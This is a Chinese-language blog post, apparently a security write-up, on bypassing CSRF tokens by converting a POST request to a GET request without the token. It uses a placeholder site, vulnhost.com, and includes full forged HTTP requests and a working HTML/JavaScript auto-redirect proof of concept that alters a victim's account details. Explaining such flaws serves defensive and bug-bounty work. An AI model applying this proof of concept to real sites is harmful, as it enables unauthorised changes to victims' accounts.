嗨,伙计们!与你们分享一些好的东西总是很愉快的。从文章的标题就可以猜到今天我将分享一些关于绕过CSRF防护的技术。
什么是CSRF保护?
简而言之,CSRF(跨站请求伪造)攻击是一种专门针对WEB站点状态更改请求的攻击。为了防止这种攻击,开发人员以多种方式在request请求中添加了ANTI-CSRF token令牌。如果你想了解详细的原理可以看看这两篇文章 “ Article-1
“,” Article-2
“
现在我们假设站点域名为vulnhost.com,该站点根据一个POST请求提供的数据验证我们的请求。vulnhost.com实际上是先将_csrf token标记到POST请求中,然后再在服务器端验证_csrf token
[*]状态更改请求看起来像是下面这样的
POST /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact HTTP/1.1
Host: en.vulnhost.com
User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://en.vulnhost.com/mycenter/settings/account.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Wicket-Ajax: true
Migration-Wicket: 6
Wicket-Ajax-BaseURL: mycenter/settings/account.html
Wicket-FocusedElementId: id49
X-Requested-With: XMLHttpRequest
Content-Length: 246
Cookie: .......
Connection: close
.
_csrf=725a7f90-192f-4b94-8fc9-6320ace14fef&id48_hf_0=&gender=radio8&firstName=xx&lastName=YY&saveContact=1
这里,_csrf=…. 用来生成随机令牌,并提交给服务端进行验证。如果我利用GET方法发送请求,并将_csrf令牌删除,那么服务端将不会对其进行验证
GET /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=XX&lastName=YY&saveContact=1 HTTP/1.1
Host: en.vulnhost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://en.vulnhost.com/mycenter/settings/account.html
Wicket-Ajax: true
Migration-Wicket: 6
Wicket-Ajax-BaseURL: mycenter/settings/account.html
Wicket-FocusedElementId: id49
X-Requested-With: XMLHttpRequest
Cookie: ...
Connection: close
正如期待的那样,服务端响应200 OK,但是使用典型的HTML POC来更改请求时会出现一些问题。以前我也遇到过,之所以会这样,是因为在这种情况下浏览器需要刷新之后才能渲染请求到的内容。我猜想GET请求包含了一堆HTTP header,这可能会中断更改请求
为了解决这个问题,我结合了javascript和HTML来构造POC
<html> <head> <script type="text/javascript"> var timer = null; function auto_reload() { window.location = 'https://en.vulnhost.com/mycenter/settings/account.html?4-2.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=Account&lastName=Takeover&saveContact=1'; } </script> <body> <!-- Reload page every 5 seconds. --> <body onload="timer = setTimeout('auto_reload()',5000);"> </body> </html>
